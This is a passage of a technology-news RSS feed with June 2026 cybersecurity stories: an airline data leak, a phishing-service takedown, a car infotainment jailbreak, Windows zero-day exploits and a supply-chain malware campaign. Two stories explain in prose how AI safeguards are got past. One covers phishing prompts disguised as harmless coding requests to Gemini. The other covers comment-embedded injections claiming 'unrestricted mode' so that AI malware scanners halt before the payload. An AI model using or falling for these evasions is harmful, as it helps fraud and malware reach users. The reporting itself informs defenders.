href="https://www.tomshardware.com/tech-industry/cyber-security/twitch-streamer-raising-money-for-cancer-treatment-has-funds-stolen-by-malware-ridden-steam-game-blockblasters-title-stole-usd150-000-from-hundreds-of-players"> BlockBlasters</a> title drained roughly $150,000 from players in the following September. As of March, the<a href="https://www.tomshardware.com/video-games/pc-gaming/the-fbi-is-looking-for-victimized-steam-users-who-downloaded-games-with-hidden-malware-investigation-underway-into-multiple-infected-titles-from-2024-to-2026"> FBI was seeking victims</a> of infected Steam games dating back to 2024. </p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Frontier Airlines site leaks all personal info with just a glance at a boarding pass, researcher claims — booking number and last name nets you every passenger's personal info, including address, passport, TSA PreCheck, and most credit card info [Updated] ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/tech-industry/cyber-security/frontier-airlines-site-leaks-all-personal-info-with-just-a-glance-at-a-boarding-pass-researcher-claims-booking-number-and-last-name-nets-you-every-passengers-personal-info-including-address-passport-tsa-precheck-and-most-credit-card-info</link>
                                                                            <description>
                            <![CDATA[ Frontier Airlines site leaks all personal info with just a glance at a boarding pass — just a booking number and last name nets you all passengers' personal info including address, passport, TSA PreCheck, and most credit card info ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">9s8MeHUM2Hqoq2USr5Gu5a</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/gnWhr8BmdLZcmY8jLkkdZP-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Thu, 18 Jun 2026 09:30:00 +0000</pubDate>                                                                                                                                <updated>Fri, 19 Jun 2026 15:57:40 +0000</updated>
                                                                                                                                            <category><![CDATA[Cybersecurity]]></category>
                                                    <category><![CDATA[Tech Industry]]></category>
                                                                                                <author><![CDATA[ editors@tomshardware.com (Bruno Ferreira) ]]></author>                    <dc:creator><![CDATA[ Bruno Ferreira ]]></dc:creator>                                                                                    <dc:source><![CDATA[ https://cdn.mos.cms.futurecdn.net/ZQiPPaXaAuQ4VrVEYnnR7G.png ]]></dc:source>
                                                                <dc:description><![CDATA[ &lt;p&gt;Bruno Ferreira&#039;s journey kicked off with the venerable ZX Spectrum, a cassette player, and his hopes and dreams. He quickly realized he had more fun figuring out how computers work than he did actually using the things. Kicking off a developer career with C and Assembly before moving to scripting languages, he&#039;s worn many hats, including both database architect and systems administration. As a teen, Bruno co-founded a web development outfit where he was for 17 years before moving on to spend nearly a decade at The Tech Report as a writer, editor, and (of course) developer. In this decade, he&#039;s been at Asus, MLCommons, and HotHardware, among others. When not fiddling with computers and games, his love for music and production sends him off to live shows and festivals. Occasionally, he pretends he can play the guitar and bass.&lt;/p&gt; ]]></dc:description>
                                                                                                                                <cf:isSponsored>false</cf:isSponsored>
                <cf:hasAffiliateLinks>false</cf:hasAffiliateLinks>
                <cf:isPaid>false</cf:isPaid>
                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/gnWhr8BmdLZcmY8jLkkdZP-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Frontier airplane]]></media:description>                                                            <media:text><![CDATA[Frontier airplane]]></media:text>
                                <media:title type="plain"><![CDATA[Frontier airplane]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/gnWhr8BmdLZcmY8jLkkdZP-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>Bob is a hacker. Just over three months ago, they <a href="https://bobdahacker.com/blog/frontier-airlines-hack" target="_blank">found serious vulnerabilities</a> in Frontier Airlines' API and website that would let anyone with a boarding pass code for a flight retrieve every passenger's personal information, including but not limited to home address, nearly all credit card info, full passport details, and even TSA PreCheck codes. The boarding pass code (called PNR) is written on the pass itself, or scannable via its barcode; plus, since it's only six digits, it's easy to loop through, something they replicated to find several passengers' full info.</p><p>Bob notified Frontier about the problem, but the company did very little to fix it; getting a hold of the aforementioned info now required the passenger's last name, also printed on the pass. So they published a post on their blog detailing several vulnerabilities in Frontier's website. </p><p>The security vulnerability is dead simple: all you have to do is take a peek at someone's boarding pass, and either note the number and the person's last name, or scan the associated barcode. Any of these is trivial with a phone. Then you feed that info into one of Frontier's mobile API endpoints, and <em>presto</em>, you'll get a reply back that includes <strong>every passenger's </strong>home address, e-mail, phone number, full date of birth, full passport data, almost the entire credit card info save for the 5 middle digits and the CVV, payment history, TSA PreCheck code, and more.</p><p>All of that info is usable for identity theft, stalking, or any other number of nefarious criminal activities. The TSA PreCheck code (Known Traveler Number) is particularly concerning for airlines, as it opens the possibility of an identity thief getting past security checks. As for the credit card number, since the first six numbers and last four are exposed along with the cardholder's name and expiration date, it's easy enough to guess the middle five digits, and then the CVV code at the back becomes the sole load-bearing security feature.</p><p>This is hardly the end of it, though. As Bob came to find, the booking management pages on Frontier's website (also reachable with just the booking number and a last name) equally expose personal information in their source code and/or API requests. Standard security practices dictate that easily-accessible pages like this use the principle of data minimization, retrieving and displaying the bare minimum until absolutely necessary.</p><p>Bob found that the "Manage My Booking" page clearly shows the name, e-mail, and phone number in the source code, while that of the "Passengers / Edit" page reveals each person's full name, country, date of birth, full passport info, and TSA PreCheck number again. Ironically, Frontier attempted a fix for the former issue, only to have the fixed version reveal more info than it originally did. These pages do obscure the data for display purposes, but it's right there in the source code and API calls.</p><p>The security expert originally reached out to Frontier on March 3 and followed up on March 9, attempting to follow the standard 90-day disclosure procedure. The company fixed the one vulnerability and sent Bob a model plane for their trouble. Bob followed up with the additional data-exposing issues and started a "compensation discussion" with the company. Frontier apparently flip-flopped on a proper response. Now, Bob says Frontier's critical vulnerabilities are still live and that Frontier's passengers "deserve better."</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ FBI dismantles Chinese phishing service that coached buyers to generate scam sites using AI —$88 cybercrime product linked to $1.9 billion in losses, 3.87 million stolen cards ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/tech-industry/cyber-security/fbi-and-google-dismantle-chinese-phishing-service-that-coached-buyers-to-generate-scam-sites-with-gemini</link>
                                                                            <description>
                            <![CDATA[ The FBI, Google, and Lumen Technologies say they’ve dismantled a China-based phishing-as-a-service operation called Outsider Enterprise. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">eCy5FtAYXYkwJdgAagaPRU</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/R3ssdiVojUJHR3VmuPKrDg-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Mon, 15 Jun 2026 11:10:54 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Cybersecurity]]></category>
                                                    <category><![CDATA[Tech Industry]]></category>
                                                                                                                    <dc:creator><![CDATA[ Luke James ]]></dc:creator>                                                                                    <dc:source><![CDATA[ https://cdn.mos.cms.futurecdn.net/C4FAi2KzwaGLUrBqzX5aBM.png ]]></dc:source>
                                                                <dc:description><![CDATA[ &lt;p&gt;Luke is a freelance technology journalist who has been covering hardware and semiconductors since 2020. He began his career at All About Circuits and has since contributed to EE Power and Laptop Mag. Luke has a particular interest in semiconductors, microelectronics, and the industry shifts that shape the devices we use every day. Above all, he loves making complex technology accessible to experts and enthusiasts alike. Luke&#039;s interest in hardcore computing can be traced back to his university studies, when he responsibly spent his very first student loan payment on a custom-built gaming rig equipped with a GTX 780 Ti. &lt;/p&gt; ]]></dc:description>
                                                                                                                                <cf:isSponsored>false</cf:isSponsored>
                <cf:hasAffiliateLinks>false</cf:hasAffiliateLinks>
                <cf:isPaid>false</cf:isPaid>
                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/R3ssdiVojUJHR3VmuPKrDg-1280-80.jpg">
                                                            <media:credit><![CDATA[Federal Bureau of Investigation]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[An FBI takedown notice for a site caught under Operation Ghost Hook. ]]></media:description>                                                            <media:text><![CDATA[An FBI takedown notice for a site caught under Operation Ghost Hook. ]]></media:text>
                                <media:title type="plain"><![CDATA[An FBI takedown notice for a site caught under Operation Ghost Hook. ]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/R3ssdiVojUJHR3VmuPKrDg-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>The FBI, Google, and Lumen Technologies say they’ve <a href="https://blog.google/innovation-and-ai/technology/safety-security/combatting-ai-scams/" target="_blank">dismantled</a> a China-based phishing-as-a-service operation called Outsider Enterprise, seizing its servers and payment wallets, and instigating a civil lawsuit. Sold through a Telegram bot for as little as $88 per week, the kit allowed buyers to spin up fake bank, toll, and delivery pages in minutes, with Google's complaint alleging its operators handed out tutorials teaching subscribers to prompt Gemini for the underlying code. The FBI links the platform to roughly 3.87 million stolen credit cards and an estimated $1.9 billion in losses since July 2023.</p><p>Zero technical skill was required to operate the Outsider software. Subscribers simply paid $88 per week, or $200 per month, via a self-service Telegram bot before choosing from more than 290 pre-built templates impersonating banks, wireless carriers, government agencies, state DMVs, the U.S. Postal Service, and toll systems such as New York's E-ZPass, according to the complaint filed in the Southern District of New York. </p><p>The kit captured victim data in real time and could request SMS codes, PINs, email codes, and app approvals on demand, allowing operators to retrieve one-time passcodes for two-factor authentication. Fake <a href="https://www.tomshardware.com/tech-industry/cryptocurrency/report-estimates-usd17-billion-worth-of-bitcoin-was-stolen-in-2025-alone-massive-haul-arises-from-impersonation-tactics-and-the-use-of-ai-for-scams">E-ZPass and other toll texts</a> have driven a wave of fraud over the past two years.</p><p>Google's filing alleges Outsider distributed step-by-step instructions, including a tutorial video, showing customers how to make Gemini write the HTML for a phishing page. The prompts were dressed up as requests for an innocuous "gift redemption page" built with inline CSS and no JavaScript, wording that was meant to read as ordinary coding help and avoid the model’s safety filters. </p><p>The resulting shell was imported back into the Outsider software and became a working scam site, multiplying the variations available from the 290 templates. Google has previously reported <a href="https://www.tomshardware.com/tech-industry/cyber-security/google-reports-that-state-hackers-from-china-russia-and-iran-are-using-gemini-in-all-stages-of-attacks-phishing-lures-coding-and-vulnerability-testing-get-ai-underpinnings-from-hostile-actors">nation-state hackers using Gemini</a> across phishing and intrusion campaigns, and researchers last year demonstrated a <a href="https://www.tomshardware.com/tech-industry/cyber-security/investigation-reveals-google-gemini-for-workspace-flaw-that-could-have-been-exploited-to-enlist-the-ai-in-phishing-schemes-summarize-this-email-tool-would-faithfully-obey-malicious-instructions-hidden-inside-an-email">Gemini for Workspace flaw</a> that obeyed instructions hidden inside emails. “Criminals increasingly use AI to make fraud like this more convincing and harder to detect,” said Brett Leatherman, assistant director of the FBI's Cyber Division.</p><p>The operation, dubbed Operation Ghost Hook and part of the FBI's wider Operation Riptide, seized the group's core admin domains, a Shopify storefront, and about $100,000 in USDT from Outsider payment wallets. Thousands of phishing domains registered through U.S. providers now redirect to an FBI splash page, and investigators used the group's own Telegram bot to pull data on its customers. Google's own count is narrower than the FBI's, citing hundreds of thousands of victims and 2.5 million scam texts sent to Android users over a two-week period in May. </p><p>For its civil suit, the company is pursuing claims under the Racketeer Influenced and Corrupt Organizations (RICO) Act and trademark infringement, though it concedes the unnamed defendants are unlikely to face extradition from China. The action follows a Google suit against the Lighthouse phishing platform last November, tied to more than 1 million victims across 120 countries.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ 2021 Honda Civic infotainment system can be jailbroken via USB — flaw uses public Android test keys to install unauthorized apps, enables for 'EvilValet' attacks ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/tech-industry/cyber-security/2021-honda-civic-infotainment-system-can-be-jailbroken-via-usb-flaw-uses-public-android-test-keys-to-install-unauthorized-apps-enables-for-evilvalet-attacks</link>
                                                                            <description>
                            <![CDATA[ A software architect determined that they could practically install anything they want on the infotainment system of their 2021 Honda Civic through the front USB port. While the head unit required a signed AOSP file to update itself, the AOSP test key is publicly known, meaning anyone with the knowledge could potentially build their own update file and load it with malware. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">f5GTiKBUWMkWyYsDajV6rH</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/9GXBwKbfhLBWFupdk6uM7M-1280-80.png" type="image/png" length="0"></enclosure>
                                                                        <pubDate>Mon, 15 Jun 2026 10:00:00 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Cybersecurity]]></category>
                                                    <category><![CDATA[Tech Industry]]></category>
                                                                                                <author><![CDATA[ editors@tomshardware.com (Jowi Morales) ]]></author>                    <dc:creator><![CDATA[ Jowi Morales ]]></dc:creator>                                                                                    <dc:source><![CDATA[ https://cdn.mos.cms.futurecdn.net/gM7E2WSDg2wgCFoaDPz9yK.jpg ]]></dc:source>
                                                                <dc:description><![CDATA[ &lt;p&gt;Jowi Morales is a writer and journalist covering the tech beat since 2021. However, he’s been interested in technology far earlier than that. He started discovering desktop computers when his father brought home a Windows 95 PC, but his first real experience working under the hood of the PC was when the old computer’s hard drive was filled to the brim in the year 2000. He deleted the Windows folder to attempt to rectify the situation, which led to his dad buying a new desktop PC. Since then, he learned a lot more about computers, and he’s always been the go-to tech expert for his family and friends.&lt;/p&gt;&lt;p&gt;Jowi primarily uses a Windows workstation and an Android phone, but he also bought into the Apple ecosystem with the 6th-gen iPad, iPhone 14 Pro Max, and the M1 MacBook Air. Today, Jowi covers hardware and software from Redmond and Cupertino, while also looking at the tech industry in general.&lt;/p&gt;&lt;p&gt;Aside from covering technology, Jowi is an avid photographer and writes about automobiles, aviation, and tanks. You can find his bylines at &lt;a href=&quot;https://www.makeuseof.com/author/jowi-morales/&quot;&gt;MakeUseOf&lt;/a&gt;, &lt;a href=&quot;https://www.slashgear.com/author/jowimorales/&quot;&gt;SlashGear&lt;/a&gt;, and, of course, &lt;a href=&quot;https://www.tomshardware.com/author/jowi-morales&quot;&gt;Tom’s Hardware&lt;/a&gt;.&lt;/p&gt; ]]></dc:description>
                                                                                                                                <cf:isSponsored>false</cf:isSponsored>
                <cf:hasAffiliateLinks>false</cf:hasAffiliateLinks>
                <cf:isPaid>false</cf:isPaid>
                                                                                                                                <media:content type="image/png" url="https://cdn.mos.cms.futurecdn.net/9GXBwKbfhLBWFupdk6uM7M-1280-80.png">
                                                            <media:credit><![CDATA[Honda]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[the infotainment system on a 2021 Honda Civic hatchback]]></media:description>                                                            <media:text><![CDATA[the infotainment system on a 2021 Honda Civic hatchback]]></media:text>
                                <media:title type="plain"><![CDATA[the infotainment system on a 2021 Honda Civic hatchback]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/9GXBwKbfhLBWFupdk6uM7M-1280-80.png" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>Software architect Eric McDonald discovered that the infotainment system of their 2021 Honda Civic has a glaring vulnerability through its front USB port. According to the post on their <a href="https://juniperspring.org/posts/honda-evil-valet/#fnref:1">blog</a>, Honda allows the head unit of this particular vehicle to be updated via USB. However, it apparently does not have strong security measures, with the hardware only looking for a signed AOSP (Android Open Source Project) file with a publicly known test key. </p><p>If you know how to set up a USB drive and sign it with this AOSP test key, you (or anyone else, for that matter) can potentially install anything on your head unit through the update path. While this is useful for tinkerers who want to get more out of their vehicles, McDonald also noted that it can be used for an “evil maid attack.” This method of compromising hardware uses the temporary physical access of a person (like a hotel maid, for example) to install malware on equipment. In their example, they said that a journalist could leave their car with a valet, and then the said valet could install malware on their infotainment system, thus giving the vulnerability the name “EvilValet.”</p><p>Once the app or malware has been installed, it could then use the myriad sensors that vehicles have to record conversations, track locations, and even capture video recordings with the owner none the wiser. It could then use the various wireless connectivity options of the infotainment system, like Bluetooth, Wi-Fi, or even cellular, to exfiltrate the data it captured.</p><p>Note that this does not affect the safety of the vehicle since the malware is limited to the infotainment system. That means it’s still impossible for the attacker to remotely control the engine or braking systems, modify its safety features, or even unlock the vehicle. But still, this is a major privacy and security concern, especially given that the Honda Civic is such a popular model. Even though most high-value targets have specialized security that helps prevent attacks like this, it could still be used against the people around them, like their security or staff, and then use the gathered information for reconnaissance or even as leverage to gain access to the target. It’s also possible that the same vulnerability exists in other car makes and models, especially as OEMs could supply the same infotainment system hardware/software to multiple brands.</p><p>Vulnerabilities like these have been known for years in the car industry — we have a report from eight years ago where <a href="https://www.tomshardware.com/news/volkswagen-cars-vulnerable-won-t-patch,36979.html">Volkswagen refused to patch a flaw</a> that could be exploited over the internet on VW and Audi models because they don’t have OTA update capabilities. There has also been a <a href="https://www.tomshardware.com/news/how-likely-remote-car-hacks,33926.html">2017 post on WikiLeaks</a> that suggests that the CIA looked into taking control of cars remotely through vehicle vulnerabilities. While internet connectivity and software features have made driving more convenient, the lack of even basic security is alarming. This is only bound to get worse as almost every new car available today has some form of advanced driver assistance systems, digital infotainment systems, wireless connectivity features, and more.</p><p>If you want to experiment with the head unit on <em>your</em> 2021 Honda Civic, McDonald built tools to make it easier to “jailbreak.” You can check out the available files on <a href="https://github.com/librick/ic1101/tree/main/ota-builder">GitHub</a>, but, as usual, you should be careful when tinkering with the infotainment system on your vehicle, as you could end up bricking it, meaning you’ll have to replace it with a new one instead.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Microsoft's bug-hunting nemesis extends vendetta with more zero-day attacks — Nightmare Eclipse publishes RoguePlanet and GreatXML local privilege escalation exploits ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/tech-industry/cyber-security/microsofts-bug-hunting-nemesis-extends-vendetta-with-more-zero-day-attacks-nightmare-eclipse-publishes-rogueplanet-and-greatxml-local-privilege-escalation-exploits</link>
                                                                            <description>
                            <![CDATA[ Nightmare-Eclipse's vendetta against Microsoft and Windows continues apace — researcher publishes RoguePlanet and GreatXML local privilege escalation zero-day exploits ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">uko9UuBW3v25d6hbPrACUR</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/Hh6jr6WsLw8YE2J2BrdLwM-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Fri, 12 Jun 2026 14:48:03 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Cybersecurity]]></category>
                                                    <category><![CDATA[Tech Industry]]></category>
                                                                                                <author><![CDATA[ editors@tomshardware.com (Bruno Ferreira) ]]></author>                    <dc:creator><![CDATA[ Bruno Ferreira ]]></dc:creator>                                                                                    <dc:source><![CDATA[ https://cdn.mos.cms.futurecdn.net/ZQiPPaXaAuQ4VrVEYnnR7G.png ]]></dc:source>
                                                                <dc:description><![CDATA[ &lt;p&gt;Bruno Ferreira&#039;s journey kicked off with the venerable ZX Spectrum, a cassette player, and his hopes and dreams. He quickly realized he had more fun figuring out how computers work than he did actually using the things. Kicking off a developer career with C and Assembly before moving to scripting languages, he&#039;s worn many hats, including both database architect and systems administration. As a teen, Bruno co-founded a web development outfit where he was for 17 years before moving on to spend nearly a decade at The Tech Report as a writer, editor, and (of course) developer. In this decade, he&#039;s been at Asus, MLCommons, and HotHardware, among others. When not fiddling with computers and games, his love for music and production sends him off to live shows and festivals. Occasionally, he pretends he can play the guitar and bass.&lt;/p&gt; ]]></dc:description>
                                                                                                                                <cf:isSponsored>false</cf:isSponsored>
                <cf:hasAffiliateLinks>false</cf:hasAffiliateLinks>
                <cf:isPaid>false</cf:isPaid>
                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/Hh6jr6WsLw8YE2J2BrdLwM-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Security smashed]]></media:description>                                                            <media:text><![CDATA[Security smashed]]></media:text>
                                <media:title type="plain"><![CDATA[Security smashed]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/Hh6jr6WsLw8YE2J2BrdLwM-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>Ever since appearing on the cybersecurity scene, <a href="https://www.tomshardware.com/tech-industry/cyber-security/microsofts-github-bans-security-researcher-who-posted-zero-day-windows-exploits-because-company-ruined-their-life-expert-claims-action-is-vindictive-and-promises-further-retaliation">Nightmare-Eclipse</a> (aka Chaotic-Eclipse) has probably been the largest thorn in the side of the Microsoft Security Response Center. <a href="https://www.tomshardware.com/tech-industry/cyber-security/microsofts-github-bans-security-researcher-who-posted-zero-day-windows-exploits-because-company-ruined-their-life-expert-claims-action-is-vindictive-and-promises-further-retaliation">The long-running saga</a> between Redmond and the disgruntled cybersecurity expert got a couple of new chapters this week, thanks to the release of the <a href="https://git.churchofmalware.org/Nightmare_Eclipse/RoguePlanet" target="_blank">RoguePlanet</a> and <a href="https://git.churchofmalware.org/Nightmare_Eclipse/GreatXML" target="_blank">GreatXML</a> exploits.</p><p>RoguePlanet is probably the nastiest one, as it takes advantage of yet another vulnerability in Windows Defender to gain SYSTEM user access privileges, letting an attacker execute commands at a privilege level even higher than the standard Administrator. The practical mechanism is simple: just fool a user into running a script, and said script will get full access to the machine, granting the ability to syphon all data, keep exfiltration malware installed, or any other number of malicious activities.</p><p>It's worth noting that RoguePlanet is dependent on a race condition seemingly between ISO mounting and Volume Shadow Copy, meaning that it's timing-based, and the exact conditions under which it can be triggered aren't guaranteed to happen every time in the victim machine. Eclipse themselves say that while they had a 100% success rate on certain installs, the exploit "struggled to work on others." </p><p>They do remark that RoguePlanet operates on a fully patched Windows system that includes the recently released June 2026 update, and that they're fairly certain that Windows Server is likewise vulnerable, necessitating a redesign of the proof-of-concept code to work around the fact that users on Server editions can't mount ISOs by default.</p><p>As for GreatXML, it's <a href="https://hivesecurity.gitlab.io/blog/greatxml-bitlocker-bypass-winre-defender-offline/" target="_blank">yet another BitLocker bypass</a>. It's far less scary than YellowKey, as the exploit conditions are much more strict, but it's still somewhat of an egg-on-face moment for Microsoft. To run the bypass, an attacker needs to write a specially crafted "unattend.xml" and a "Recovery" directory to Windows' recovery partition. Then, if a Windows Defender Offline Scan is run or has been run in the past, rebooting into the recovery environment will open the BitLocker-protected drive just fine.</p><p>The requirements are a pretty high bar to clear for an attacker, but the validity of the approach still raises questions about which backdoor-looking behaviors are still present in BitLocker and the Windows Recovery Environment (WinRE). Eclipse believes that it may be possible to trigger a Defender Offline Scan without logging in, but that's not a certain thing at this point. Having said that, it wouldn't be surprising if tomorrow they came up with a way to do just that.</p><p>Given that Eclipse's spat with Microsoft has resulted in Redmond banning their GitHub account, the researcher has since moved their proof-of-concept to Church of Malware, a somewhat unrestricted community and code repository for exploits. Amusingly enough, though, <a href="https://github.com/MSNightmare/" target="_blank">a secondary GitHub account</a> of theirs remains online.</p><p>The firm previously threatened legal action against Eclipse, too, but has since backed down. From their side, Eclipse had previously threatened to mass-disclose zero-day Windows vulnerabilities on July 14. They too <a href="https://deadeclipse666.blogspot.com/2026/06/regarding-july-14th.html" target="_blank">have since then relented</a>, stating that writing RoguePlanet took more time than expected, and that they may take a break and seemingly won't make the July 14 date the Windowspocalypse Day after all.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ New malware campaign tricks AI scanners with fake nuclear weapon prompts — malicious code triggers safety failsafes so scanners skip the payload ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/tech-industry/cyber-security/hades-malware-campaign-now-tricks-ai-bots-by-injecting-text-about-biological-and-nuclear-weapons-failsafe-mechanisms-triggered-by-prompts-for-weapon-creation-stop-scans-before-payload-is-seen</link>
                                                                            <description>
                            <![CDATA[ Hades malware campaign now tricks AI bots into not scanning development packages, as prompts for bio- and nuclear weapons trigger failsafe mechanisms. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">y4eTtbWKRJRpXpQpVVGfwB</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/HiKsJSCERCZaDHT4JRjGnd-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Fri, 12 Jun 2026 10:30:00 +0000</pubDate>                                                                                                                                <updated>Fri, 12 Jun 2026 11:48:40 +0000</updated>
                                                                                                                                            <category><![CDATA[Cybersecurity]]></category>
                                                    <category><![CDATA[Tech Industry]]></category>
                                                                                                <author><![CDATA[ editors@tomshardware.com (Bruno Ferreira) ]]></author>                    <dc:creator><![CDATA[ Bruno Ferreira ]]></dc:creator>                                                                                    <dc:source><![CDATA[ https://cdn.mos.cms.futurecdn.net/ZQiPPaXaAuQ4VrVEYnnR7G.png ]]></dc:source>
                                                                <dc:description><![CDATA[ &lt;p&gt;Bruno Ferreira&#039;s journey kicked off with the venerable ZX Spectrum, a cassette player, and his hopes and dreams. He quickly realized he had more fun figuring out how computers work than he did actually using the things. Kicking off a developer career with C and Assembly before moving to scripting languages, he&#039;s worn many hats, including both database architect and systems administration. As a teen, Bruno co-founded a web development outfit where he was for 17 years before moving on to spend nearly a decade at The Tech Report as a writer, editor, and (of course) developer. In this decade, he&#039;s been at Asus, MLCommons, and HotHardware, among others. When not fiddling with computers and games, his love for music and production sends him off to live shows and festivals. Occasionally, he pretends he can play the guitar and bass.&lt;/p&gt; ]]></dc:description>
                                                                                                                                <cf:isSponsored>false</cf:isSponsored>
                <cf:hasAffiliateLinks>false</cf:hasAffiliateLinks>
                <cf:isPaid>false</cf:isPaid>
                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/HiKsJSCERCZaDHT4JRjGnd-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Malware hiding]]></media:description>                                                            <media:text><![CDATA[Malware hiding]]></media:text>
                                <media:title type="plain"><![CDATA[Malware hiding]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/HiKsJSCERCZaDHT4JRjGnd-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>Hades is one of many currently-running malware campaigns, mostly (but not solely) targeting development packages used for scientific and machine-learning purposes. The supply-chain attack campaign <a href="https://socket.dev/blog/mini-shai-hulud-miasma-and-hades-worms-target-bioinformatics-and-mcp-developers-via-malicious">recently received several upgrades</a>, and one of the most interesting is also deceptively simple: The code includes prompt-injection attacks that might stop cursory checks by AI bots, letting the malware through. The way it works in a nutshell: Some JavaScript files include a code comment containing instructions that tell the bot it's running in unrestricted mode with no safety guidelines. Then it asks to create biological and nuclear weapons, with a detailed description.</p><p>If you're thinking that a malware-scanning bot can't be <em>that </em>dumb as to follow any of those instructions, you're absolutely right — and that's exactly what makes the attack work, as the bots' failsafe mechanisms will trigger, so then they won't scan the rest of the file where the actual payload resides.</p><p>This is called an "adversarial attack" in AI parlance, and, generally speaking, it's not expected to be widely effective, but any little bit helps the malfeasants. Having said that, an X user had Anthropic Fable try to scan the file, and sure enough, he got the well-known "Chat paused" message. <br><br>That is by no means scientific, and it's reasonable to assume that malware-scanning models will be configured more accurately for this task. However, this somewhat implies that a cursory check by a developer asking "does this Python package I just installed contain malware?" might be met with a reply of "of course not, boss, you're good to go!" Even bots scanning CI/CD development pipelines might fall for it.</p><p>Socket's blog post does remark that other analysis types will still work fine, including pattern matching, actually parsing the source code, checking for randomized sections likely to hide malicious payloads, and actually running the code in a sandboxed environment. The now-upgraded malware does reportedly contain a trigger that <a href="https://getaibook.com/news/ai-prompt-injection-masks-malware-in-19-pypi-science-package/">makes it wipe itself</a> via various mechanisms, with a common one being detecting if it's running in a sandbox.</p><p>That's not the only skill that got levelled up, either. In some instances, the loading mechanism and the payload itself reside in separate packages that are commonly installed together; this sort of split is mostly unexpected for common scanners. This time around, the malware developers also leaned harder into precompiled binaries, commonly found in performance-sensitive Python packages. They also made sure that more payloads only trigger when the packages are actually initialized/run in the target's code (via Python's "import" statement), rather than when they're installed, further evading cursory detection.</p><p>The campaign likewise has stickier fingers overall: Rather than just mainly stealing CI/CD credentials, it now gets its grubby mitts on npm, PyPI, RubyGems, JFrog, and Kubernetes service account tokens, AWS temporary credentials, SSH keys, Docker configurations, shell histories, .env files, and AI developer tool configurations. As of this writing, an estimated 37 Python and 106 JavaScript packages are part of the expanded bombardment, including multiple typo-squatting instances, like "rsquests" instead of "requests."</p><p>You'd think that the target audience, comprised of scientific and AI engineers, would be mindful of common security practices like verifying the names and authorship of packages... and you'd be disappointed. From my own experience being a systems administrator for extremely well-paid AI engineers, a concerning number of them don't even know how to configure Git, or the basics of how email works. Let that sink in for a second.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ AMD denies researcher a $10,000 bug bounty after fixing critical auto-updater vulnerability — security flaw took 124 days to patch ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/tech-industry/cyber-security/amd-denies-researcher-a-usd10-000-bug-bounty-after-fixing-critical-auto-updater-vulnerability-security-flaw-took-124-days-to-patch</link>
                                                                            <description>
                            <![CDATA[ AMD took over four months to fix a critical security bug in its autoupdater, and the security researcher didn't see a dime for his efforts ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">Sf6mu96fdm23w69iLv22TA</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/tsQMpJtLWfM65SXQmxWizQ-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
